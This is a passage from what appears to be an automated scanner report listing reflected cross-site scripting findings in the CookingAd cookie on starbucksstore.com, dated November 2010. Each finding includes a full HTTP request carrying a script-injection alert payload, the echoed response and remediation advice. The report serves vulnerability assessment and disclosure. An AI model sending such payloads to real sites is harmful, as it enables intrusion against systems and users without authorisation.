       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
products/shourplg.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shourplg.asp"
   var s_prop3="SBPTPAHP1SHTBD15C0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F0BD362F13"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shourplg.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_
...[SNIP]...

3.60. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa301</script><script>alert(1)</script>0485f7d85aa was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodde.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfa301</script><script>alert(1)</script>0485f7d85aa;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:31 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTBFA301</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0485F7D85AA"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.61. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 109e9</script><script>alert(1)</script>b870a4bcca was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodde.asp?SKU=309195 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB109e9</script><script>alert(1)</script>b870a4bcca;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11887
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:26 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ageName="Detail Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Detail Page : 309195 : "
   var s_prop3="SBPTPAHP1SHTB109E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B870A4BCCA"
   var s_prop4=""
   var s_prop5="309195 : "
   var s_prop6="/products/shprodde.asp?SKU=309195"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.62. http://www.starbucksstore.com/products/shprodli.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodli.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9727f</script><script>alert(1)</script>9636677bff4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodli.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB9727f</script><script>alert(1)</script>9636677bff4;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:00 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
Name="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shprodli.asp"
   var s_prop3="SBPTPAHP1SHTB9727F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9636677BFF4"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shprodli.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9="Search Listing: Internal: "
   var s_prop10=""
   /* E-commerce Variables */
   
...[SNIP]...

3.63. http://www.starbucksstore.com/products/sitemap.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/sitemap.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 798a2</script><script>alert(1)</script>711801d72b9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/sitemap.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB798a2</script><script>alert(1)</script>711801d72b9;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21157
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:26 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
"/products/sitemap.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/sitemap.asp"
   var s_prop3="SBPTPAHP1SHTB798A2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>711801D72B9"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/sitemap.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_s
...[SNIP]...

3.64. http://www.starbucksstore.com/products/terms.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/terms.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d241</script><script>alert(1)</script>487db803af4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/terms.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2d241</script><script>alert(1)</script>487db803af4;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15962
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:01 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ame="/products/terms.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/terms.asp"
   var s_prop3="SBPTPAHP1SHTB2D241</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>487DB803AF4"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/terms.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_sta
...[SNIP]...

3.65. http://www.starbucksstore.com/small-office-coffee [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /small-office-coffee

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae82</script><script>alert(1)</script>675c202d2cd was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /small-office-coffee HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfae82</script><script>alert(1)</script>675c202d2cd;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20742
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:15 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Cont
...[SNIP]...
ice HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Small Office HomePage"
   var s_prop3="SBPTPAHP1SHTBFAE82</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>675C202D2CD"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/small-office-coffee/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign="
...[SNIP]...

3.66. http://www.starbucksstore.com/starbucks-coffee-delivery [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-delivery

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e71</script><script>alert(1)</script>14d1501ca39 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-delivery HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBb3e71</script><script>alert(1)</script>14d1501ca39;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:16 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       
       <meta HTTP-EQUIV="Conten
...[SNIP]...
at Home HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks at Home HomePage"
   var s_prop3="SBPTPAHP1SHTBB3E71</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>14D1501CA39"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-delivery/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_camp
...[SNIP]...

3.67. http://www.starbucksstore.com/starbucks-coffee-delivery/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-delivery/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd3e</script><script>alert(1)</script>0ff078f663a was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-delivery/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBbfd3e</script><script>alert(1)</script>0ff078f663a;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:04 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       
       <meta HTTP-EQUIV="Conten
...[SNIP]...
at Home HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks at Home HomePage"
   var s_prop3="SBPTPAHP1SHTBBFD3E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0FF078F663A"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-delivery/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_camp
...[SNIP]...

3.68. http://www.starbucksstore.com/starbucks-coffee-tours/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-tours/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d9d8</script><script>alert(1)</script>b1e2ceb23fc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1d9d8</script><script>alert(1)</script>b1e2ceb23fc;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16822
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:32 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
e="Starbucks Tours Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Tours Page"
   var s_prop3="SBPTPAHP1SHTB1D9D8</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B1E2CEB23FC"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-tours/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaig
...[SNIP]...

3.69. http://www.starbucksstore.com/starbucks-gift-cards [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gift-cards

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f0a0</script><script>alert(1)</script>ba0159ff903 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gift-cards HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2f0a0</script><script>alert(1)</script>ba0159ff903;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19751
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:19 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
rbucks Card HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Card HomePage"
   var s_prop3="SBPTPAHP1SHTB2F0A0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>BA0159FF903"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gift-cards/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=
...[SNIP]...

3.70. http://www.starbucksstore.com/starbucks-gifts [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gifts

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9ad5</script><script>alert(1)</script>a10c039ee07 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gifts HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf9ad5</script><script>alert(1)</script>a10c039ee07;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ame="Starbucks Gift Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Gift Page"
